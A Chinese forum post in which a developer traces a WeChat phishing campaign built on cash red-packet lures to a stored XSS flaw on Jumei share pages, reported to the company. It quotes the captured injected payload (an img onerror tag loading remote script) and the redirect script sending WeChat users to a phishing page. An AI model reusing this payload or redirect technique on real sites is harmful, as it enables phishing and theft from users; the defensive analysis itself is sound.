你尚未登录,仅允许查看本站部分内容。请登录使用邀请码注册
zswang

记一次发现「聚美优品网站漏洞被用于微信钓鱼」的过程 2个回复 专栏 @ 探索

zswang 发布于 4 月前

微信是一个方便分享信息的地方,但大家在分享信息的时候最好有一个甄别。微信是一个比较封闭的信息空间,没有那么多人帮你矫正信息。无论出发点是什么,传播未经考证消息,很可能被不法分子利用。本文记录一次发现利用网站漏洞在微信里钓鱼的过程

背景

钓鱼页是在朋友圈看到的,见截图:

分享人身份

  • 行业非 IT
  • 所在地非一线城市
  • 我的初中同学

分享信息

  • 现金红包相关
  • 连续发出两条

初步分析

其实一年前这样的转发对我没什么吸引力。这半年都是在做微信分享现金红包相关的工作

  • 这是明显的诱导分享,平时不见他发什么消息,这次连续转两条。
  • 分享量应该挺大,我这小圈子都能见到。
  • 能绕开微信对垃圾消息的封禁,微信分享潜规则还是很多的。

抓包证实

工具

抓包结果

  • 抓包结果证实,这是以现金红包为鱼饵的钓鱼链接。
  • 通过聚美优品的网站漏洞,躲避微信的防御。

钓鱼截图

  • 开红包

  • 领取红包

  • 诱导分享四次后的提示

分享到两个不同的群(其中第二次必然失败,变成了三次群)、分享到朋友圈

  • 钓鱼完成

网站漏洞

数据来源

  • request
GET /show/share/show/detail?show_id=485960 HTTP/1.1
Host : 0154mtshowjumeicg.jumei.com
  • response body
{
    "code": 0,
    "action": "",
    "message": "",
    "data": {
        "user_info": {
            "uid": "140687838",
            "vip": "0",
            "nickname": "JM131AKNK586oJig",
            ....
        },
        "title": "<img src=\"x\" onerror=\"s=createElement('script');body.appendChild(s);s.src='//sitiao.applinzi.com/x.php';\">",
        "items": [],
        ....
        "praises": [],
        "description": "<img src=\"x\" onerror=\"s=createElement('script');body.appendChild(s);s.src='//sitiao.applinzi.com/x.php';\">",
    }
}

被注入的脚本

  • request
GET /x.php HTTP/1.1
Host : sitiao.applinzi.com
var ua = navigator.userAgent;
if(ua.indexOf("MicroMessenger")>0){
    var jUrl = "http://j7w9a1487340361.chinacloudapp.cn/rp.html?k0o=T3oVt";
    top.location.href=jUrl;
}

钓鱼流程

总结

这是典型的 XSS 漏洞,页面在渲染 Ajax 数据时未进行防范。

  • 存在漏洞的页面:
request

GET /show/share/sw.jsp?id=485960&_uid=1487339705 HTTP/1.1
Host : 0154mtshowjumeicg.jumei.com
  • 不法分子利用该漏洞绕开了微信分享的防范。以现金红包为诱饵,在微信中形成传播和攻击。

  • 至于有什么危害,钓鱼一般就是骗取用户资料、账号、资金等。

  • 发现该问题以后,第一时间通过微博反馈给聚美优品

总之天上不会掉馅饼。不起贪念,也不传播未经证实消息。

登录后回复,如无账号,请使用邀请码注册